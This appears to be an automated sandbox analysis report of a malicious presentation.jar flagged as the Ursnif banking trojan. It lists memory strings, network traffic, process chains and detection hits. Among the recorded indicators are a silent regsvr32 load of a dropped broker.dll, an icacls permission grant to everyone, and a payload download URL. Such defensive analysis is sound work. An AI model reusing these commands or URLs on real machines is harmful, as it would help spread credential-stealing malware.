Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml5.5.dr	String found in binary or memory: http://www.twitter.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml6.5.dr	String found in binary or memory: http://www.wikipedia.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml7.5.dr	String found in binary or memory: http://www.youtube.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: notice[1].js.6.dr	String found in binary or memory: https://api-js-log.trustarc.com/error
Source: 67B873F492AD87C25B322202223D7A22.cache[1].htm.6.dr	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=238559
Source: ~DFF893335E5A47C1F6.TMP.5.dr	String found in binary or memory: https://consent-pref.trustarc.com/?type=oracle6&site=oracle.com&action=notice&country=ch&locale=en&b
Source: ~DFF893335E5A47C1F6.TMP.5.dr	String found in binary or memory: https://consent-pref.trustarc.com/cookie_inneriframe.html
Source: ~DFF893335E5A47C1F6.TMP.5.dr	String found in binary or memory: https://consent-pref.trustarc.com/defaultpreferencemanager/67B873F492AD87C25B322202223D7A22.cache.ht
Source: notice[1].js.6.dr	String found in binary or memory: https://consent.trustarc.com/
Source: ~DFF893335E5A47C1F6.TMP.5.dr	String found in binary or memory: https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com
Source: notice[1].js.6.dr	String found in binary or memory: https://consent.trustarc.com/log
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp, java.exe, 00000002.00000002.379414082.000000000A00F000.00000004.00000001.sdmp	String found in binary or memory: https://docs.cyberservices.biz/presentation.dll
Source: renderer[1].js.6.dr	String found in binary or memory: https://github.com/requirejs/requirejs/blob/master/LICENSE
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: java.exe, 00000002.00000002.387883522.0000000016730000.00000004.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: ~DFF893335E5A47C1F6.TMP.5.dr	String found in binary or memory: https://prefmgr-cookie.truste-svc.net/cookie_js/cookie_iframe.html?parent=https://consent-pref.trust
Source: ~DFF893335E5A47C1F6.TMP.5.dr, en[1].htm.6.dr	String found in binary or memory: https://s.go-mpulse.net/boomerang/
Source: ~DFF893335E5A47C1F6.TMP.5.dr, en[1].htm.6.dr	String found in binary or memory: https://s2.go-mpulse.net/boomerang/
Source: java.exe, 00000002.00000002.379414082.000000000A00F000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS
Source: java.exe, 00000002.00000002.379414082.000000000A00F000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	String found in binary or memory: https://sectigo.com/CPS0
Source: en[1].htm.6.dr	String found in binary or memory: https://static.oracle.com/cdn/cec/v21.2.1.30
Source: en[1].htm.6.dr	String found in binary or memory: https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/controller.js
Source: ~DFF893335E5A47C1F6.TMP.5.dr	String found in binary or memory: https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/renderer.js
Source: ~DFF893335E5A47C1F6.TMP.5.dr	String found in binary or memory: https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/require.js
Source: notice[1].js.6.dr	String found in binary or memory: https://trustarc.mgr.consensu.org/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 13.224.193.90:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.224.193.90:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.98.25:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.98.25:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.98.126:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.98.126:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.181.18.61:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.181.18.61:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.202.206.65:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.202.206.65:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.87.249.219:443 -> 192.168.2.6:49734 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000008.00000003.526878948.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.regsvr32.exe.3ed0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.regsvr32.exe.2f8d23.0.raw.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000008.00000003.526878948.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.regsvr32.exe.3ed0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.regsvr32.exe.2f8d23.0.raw.unpack, type: UNPACKEDPE

System Summary:

Source: C:\Windows\SysWOW64\regsvr32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_03ED2485 NtQueryVirtualMemory,

8_2_03ED2485

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03ED2264	8_2_03ED2264
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EE0C80	8_2_03EE0C80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EDFB80	8_2_03EDFB80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EF1398	8_2_03EF1398
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EFA357	8_2_03EFA357
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EE89D3	8_2_03EE89D3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EF7960	8_2_03EF7960
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EE7131	8_2_03EE7131
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EF186B	8_2_03EF186B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EF204B	8_2_03EF204B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EF784A	8_2_03EF784A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EFDD4C	8_2_03EFDD4C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EF246B	8_2_03EF246B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EE5C73	8_2_03EE5C73
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EF1C3F	8_2_03EF1C3F

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 03EE5BF0 appears 56 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 03EE82D2 appears 31 times

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: classification engine

Classification label: mal84.troj.expl.winJAR@13/79@15/7

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_01

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user

Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Section loaded: C:\Program Files (x86)\Java\jre1.8.0_211\bin\client\jvm.dll

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: presentation.jar

Virustotal: Detection: 22%

Source: java.exe	String found in binary or memory: sun/launcher/
Source: java.exe	String found in binary or memory: -addRecord

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'' >> C:\cmdlinestart.log 2>&1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.java.com/
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6900 CREDAT:17410 /prefetch:2
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\AppData\Local\broker.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.java.com/	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\AppData\Local\broker.dll	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6900 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:

Binary string: c:\119\Minute\Force_Lead\Apple\oil.pdb source: regsvr32.exe, 00000008.00000002.596564927.0000000003F04000.00000002.00020000.sdmp, broker.dll.2.dr

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_03ED1F31 LoadLibraryA,GetProcAddress,

8_2_03ED1F31

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\AppData\Local\broker.dll

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_3_1509D98F push ebp; retf	2_3_1509DCCB
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_3_1509CF90 pushfd ; iretd	2_3_1509CF95
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03ED2253 push ecx; ret	8_2_03ED2263
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03ED2200 push ecx; ret	8_2_03ED2209
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EE439D push ecx; ret	8_2_03EE43B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EE5C35 push ecx; ret	8_2_03EE5C48

Persistence and Installation Behavior:

Exploit detected, runtime environment dropped PE file

Show sources

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File created: broker.dll.2.dr

Jump to dropped file

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File created: C:\Users\user\AppData\Local\broker.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000008.00000003.526878948.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.regsvr32.exe.3ed0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.regsvr32.exe.2f8d23.0.raw.unpack, type: UNPACKEDPE

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\broker.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4404	Thread sleep count: 178 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6636	Thread sleep count: 35 > 30			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: java.exe, 00000002.00000002.384747963.0000000015AB0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: java.exe, 00000002.00000002.364507558.0000000002830000.00000004.00000001.sdmp	Binary or memory string: ,java/lang/VirtualMachineError
Source: java.exe, 00000002.00000002.364507558.0000000002830000.00000004.00000001.sdmp	Binary or memory string: \|[Ljava/lang/VirtualMachineError;
Source: java.exe, 00000002.00000002.384747963.0000000015AB0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: java.exe, 00000002.00000002.384747963.0000000015AB0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: java.exe, 00000002.00000002.384747963.0000000015AB0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_03EE39FC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

8_2_03EE39FC

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_03ED1F31 LoadLibraryA,GetProcAddress,

8_2_03ED1F31

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03F42668 mov eax, dword ptr fs:[00000030h]	8_2_03F42668
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03F421A5 push dword ptr fs:[00000030h]	8_2_03F421A5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03F4259E mov eax, dword ptr fs:[00000030h]	8_2_03F4259E

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EE39FC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_03EE39FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EE5973 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_03EE5973
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EE5618 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_03EE5618
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EECC83 __decode_pointer,SetUnhandledExceptionFilter,	8_2_03EECC83
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_03EECC61 SetUnhandledExceptionFilter,__encode_pointer,	8_2_03EECC61

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Memory protected: page read and write | page guard

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.java.com/	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\AppData\Local\broker.dll	Jump to behavior

Source: regsvr32.exe, 00000008.00000002.596274889.0000000002AC0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000008.00000002.596274889.0000000002AC0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: regsvr32.exe, 00000008.00000002.596274889.0000000002AC0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: regsvr32.exe, 00000008.00000002.596274889.0000000002AC0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_03F00ADD cpuid

8_2_03F00ADD

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	8_2_03ED1566
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	8_2_03EEFBA2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,	8_2_03EED364
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesA,	8_2_03EEFB78
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	8_2_03EEFAB7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,	8_2_03EFDA64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	8_2_03F009F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,	8_2_03F008BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,	8_2_03F00881
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	8_2_03EED879
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	8_2_03EEF875
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LcidFromHexString,GetLocaleInfoA,	8_2_03EEF7DF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,	8_2_03EF66E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,	8_2_03EEF6FD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	8_2_03EECCD5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,	8_2_03EEFC43
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	8_2_03EEFC07

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_03ED17A7 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

8_2_03ED17A7

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_03EFCD0B __lock,__invoke_watson,__invoke_watson,__invoke_watson,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,__invoke_watson,__invoke_watson,

8_2_03EFCD0B

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_03ED146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

8_2_03ED146C

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000008.00000003.526878948.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.regsvr32.exe.3ed0000.1.unpack, type: UNPACKEDPE
